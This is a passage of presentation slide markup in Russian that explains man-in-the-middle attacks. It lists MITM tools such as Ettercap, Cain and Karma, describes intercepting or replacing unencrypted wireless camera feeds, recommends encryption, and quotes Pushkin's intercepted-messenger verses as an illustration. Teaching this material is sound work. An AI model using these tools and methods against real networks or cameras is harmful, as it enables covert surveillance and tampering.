          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>термин в криптографии, обозначающий ситуацию, когда атакующий способен читать и видоизменять по своей воле сообщения, которыми обмениваются корреспонденты, причём ни один из последних не может догадаться о его присутствии в канале.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Программы для атак типа «человек посередине» (см. ссылки в </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://en.wikipedia.org/wiki/Man-in-the-middle_attack#MITM_Implementation_Examples</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>dsniff - A tool for SSH and SSL MITM attacks</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Cain - A Windows GUI tool which can perform MITM attacks, along with sniffing and ARP poisoning</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Ettercap - A tool for LAN based MITM attacks</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Karma - A tool that uses 802.11 Evil Twin attacks to perform MITM attacks</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>AirJack - A tool that demonstrates 802.11 based MITM attacks</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>wsniff - A tool for 802.11 HTTP/HTTPS based MITM attacks</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Перехват сигнала с камер наблюдения</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Беспроводные камеры слежения позволяют контролировать ситуацию на частных территориях, в музеях и магазинах. Большинство моделей передает изображение на монитор в незашифрованном виде, или возможность шифрования отключена в них по умолчанию. С помощью подходящего приемного устройства, например «бебифона» с дисплеем, данные можно перехватить. Хакеры пользуются тем, что камеры видеонаблюдения работают лишь на нескольких свободных частотах. Чтобы задействовать другие, производителям пришлось бы идти на дополнительные издержки, что повлекло бы за собой значительное удорожание камер. В такой ситуации сохраняется риск, что любой человек, вооружившись устройством, предназначенным для видеонаблюдения за ребенком, сможет следить и за охраняемой территорией. При этом потенциальный злоумышленник сможет соблюдать значительную дистанцию: некоторые модели таких устройств способны принимать сигнал с расстояния до 5 км. Более того, используя специальное программное обеспечение, например утилиту Videohak, хакеры могут перехватывать видеопоток по принципу «Man-in-the-middle» («человек в середине») и полностью заменять его на собственное видео.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Способ защиты. Используйте камеру, которая предоставляет возможность шифрования данных — например, по технологии WPA2.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>В</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>те-поры война была.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Царь Салтан, с женой простяся,</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>На добра-коня садяся,</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Ей наказывал себя</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Поберечь, его любя.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Между тем, как он далёко</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Бьется долго и жестоко,</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Наступает срок родин;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Сына Бог им дал в аршин,</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>И царица над ребенком</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Как орлица над орленком;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Шлет с письмом она гонца,</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Чтоб обрадовать отца.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>А ткачиха с поварихой,</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>С сватьей бабой Бабарихой,</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Извести ее хотят,</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Перенять гонца велят;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Сами шлют гонца другого</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Вот с чем от слова до слова:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>„</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Родила царица в ночь</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
